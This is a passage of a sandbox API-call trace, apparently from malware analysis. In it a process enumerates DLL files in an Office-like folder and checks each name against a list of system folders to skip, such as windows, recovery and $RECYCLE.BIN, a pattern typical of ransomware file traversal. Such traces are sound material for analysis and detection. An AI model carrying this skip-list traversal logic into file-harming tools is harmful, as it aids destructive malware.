hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0137.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0137.559] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc5208c8f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc5208c8f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd97ecd84, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5dd8f8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NL7MODELS000A.dll", cAlternateFileName="NL7MOD~2.DLL")) returned 1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2=".") returned 1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2="..") returned 1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2="...") returned 1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2="windows") returned -1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2="recovery") returned -1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2="perflogs") returned -1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2="documents and settings") returned 1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2="system volume information") returned -1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000A.dll", lpString2="msocache") returned 1 [0137.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS000A.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0137.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS000A.dll", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7MODELS000A.dll", lpUsedDefaultChar=0x0) returned 17 [0137.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0137.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS000A.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0137.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS000A.dll", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7MODELS000A.dll", lpUsedDefaultChar=0x0) returned 17 [0137.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0137.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0137.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0137.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0137.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0137.559] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc527b37f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc527b37f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd928f97c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x546ef8, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NL7MODELS000C.dll", cAlternateFileName="NL7MOD~3.DLL")) returned 1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2=".") returned 1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2="..") returned 1 [0137.559] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2="...") returned 1 [0137.560] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2="windows") returned -1 [0137.560] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2="recovery") returned -1 [0137.560] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2="perflogs") returned -1 [0137.560] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2="documents and settings") returned 1 [0137.560] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.560] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2="system volume information") returned -1 [0137.560] lstrcmpiW (lpString1="NL7MODELS000C.dll", lpString2="msocache") returned 1 [0137.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS000C.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0137.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS000C.dll", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7MODELS000C.dll", lpUsedDefaultChar=0x0) returned 17 [0137.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0137.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS000C.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0137.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7MODELS000C.dll", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7MODELS000C.dll", lpUsedDefaultChar=0x0) returned 17 [0137.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0137.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0137.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0137.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0137.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0137.560] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c779d41, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ad698, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NL7Models0011.DLL", cAlternateFileName="NL7MOD~4.DLL")) returned 1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2=".") returned 1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2="..") returned 1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2="...") returned 1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2="windows") returned -1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2="recovery") returned -1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2="perflogs") returned -1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2="documents and settings") returned 1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2="system volume information") returned -1 [0137.560] lstrcmpiW (lpString1="NL7Models0011.DLL", lpString2="msocache") returned 1 [0137.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0137.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Models0011.DLL", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0137.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Models0011.DLL", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7Models0011.DLL", lpUsedDefaultChar=0x0) returned 17 [0137.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0137.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0137.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Models0011.DLL", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0137.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NL7Models0011.DLL", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NL7Models0011.DLL", lpUsedDefaultChar=0x0) returned 17 [0137.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0137.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0137.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0137.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0137.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0137.561] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd2a40778, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd2a40778, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2c7cb2a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa320, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="NPSPWRAP.DLL", cAlternateFileName="")) returned 1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2=".") returned 1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="..") returned 1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="...") returned 1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="windows") returned -1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="recovery") returned -1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="perflogs") returned -1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="documents and settings") returned 1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="system volume information") returned -1 [0137.561] lstrcmpiW (lpString1="NPSPWRAP.DLL", lpString2="msocache") returned 1 [0137.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0137.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NPSPWRAP.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NPSPWRAP.DLL", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NPSPWRAP.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0137.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0137.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NPSPWRAP.DLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NPSPWRAP.DLL", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NPSPWRAP.DLL", lpUsedDefaultChar=0x0) returned 12 [0137.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0137.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0137.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0137.561] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc34153d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd50d8964, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd52c882e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1165048, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OART.DLL", cAlternateFileName="")) returned 1 [0137.561] lstrcmpiW (lpString1="OART.DLL", lpString2=".") returned 1 [0137.561] lstrcmpiW (lpString1="OART.DLL", lpString2="..") returned 1 [0137.562] lstrcmpiW (lpString1="OART.DLL", lpString2="...") returned 1 [0137.562] lstrcmpiW (lpString1="OART.DLL", lpString2="windows") returned -1 [0137.562] lstrcmpiW (lpString1="OART.DLL", lpString2="recovery") returned -1 [0137.562] lstrcmpiW (lpString1="OART.DLL", lpString2="perflogs") returned -1 [0137.562] lstrcmpiW (lpString1="OART.DLL", lpString2="documents and settings") returned 1 [0137.562] lstrcmpiW (lpString1="OART.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.562] lstrcmpiW (lpString1="OART.DLL", lpString2="system volume information") returned -1 [0137.562] lstrcmpiW (lpString1="OART.DLL", lpString2="msocache") returned 1 [0137.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0137.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OART.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0137.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OART.DLL", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OART.DLL", lpUsedDefaultChar=0x0) returned 8 [0137.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0137.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0137.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OART.DLL", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0137.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OART.DLL", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OART.DLL", lpUsedDefaultChar=0x0) returned 8 [0137.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0137.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0137.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0137.562] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c79ffa0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3262b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OARTODF.DLL", cAlternateFileName="")) returned 1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2=".") returned 1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2="..") returned 1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2="...") returned 1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2="windows") returned -1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2="recovery") returned -1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2="perflogs") returned -1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2="documents and settings") returned 1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2="$RECYCLE.BIN") returned 1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2="system volume information") returned -1 [0137.562] lstrcmpiW (lpString1="OARTODF.DLL", lpString2="msocache") returned 1 [0137.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0137.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OARTODF.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OARTODF.DLL", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OARTODF.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0137.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0137.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OARTODF.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OARTODF.DLL", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OARTODF.DLL", lpUsedDefaultChar=0x0) returned 11 [0137.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0137.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0137.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0137.563] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddd0ee4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddd0ee4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x37c48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OCHelper.dll", cAlternateFileName="")) returned 1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2=".") returned 1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2="..") returned 1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2="...") returned 1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2="windows") returned -1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2="recovery") returned -1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2="perflogs") returned -1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2="documents and settings") returned 1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2="system volume information") returned -1 [0137.563] lstrcmpiW (lpString1="OCHelper.dll", lpString2="msocache") returned 1 [0137.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0137.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCHelper.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCHelper.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCHelper.dll", lpUsedDefaultChar=0x0) returned 12 [0137.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0137.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0137.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCHelper.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCHelper.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCHelper.dll", lpUsedDefaultChar=0x0) returned 12 [0137.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0137.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0137.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0137.563] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd41f54a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcd41f54a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdecb6a42, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x103668, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ocimport.dll", cAlternateFileName="")) returned 1 [0137.563] lstrcmpiW (lpString1="ocimport.dll", lpString2=".") returned 1 [0137.563] lstrcmpiW (lpString1="ocimport.dll", lpString2="..") returned 1 [0137.563] lstrcmpiW (lpString1="ocimport.dll", lpString2="...") returned 1 [0137.563] lstrcmpiW (lpString1="ocimport.dll", lpString2="windows") returned -1 [0137.563] lstrcmpiW (lpString1="ocimport.dll", lpString2="recovery") returned -1 [0137.563] lstrcmpiW (lpString1="ocimport.dll", lpString2="perflogs") returned -1 [0137.563] lstrcmpiW (lpString1="ocimport.dll", lpString2="documents and settings") returned 1 [0137.563] lstrcmpiW (lpString1="ocimport.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.563] lstrcmpiW (lpString1="ocimport.dll", lpString2="system volume information") returned -1 [0137.564] lstrcmpiW (lpString1="ocimport.dll", lpString2="msocache") returned 1 [0137.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0137.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocimport.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocimport.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocimport.dll", lpUsedDefaultChar=0x0) returned 12 [0137.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0137.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0137.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocimport.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 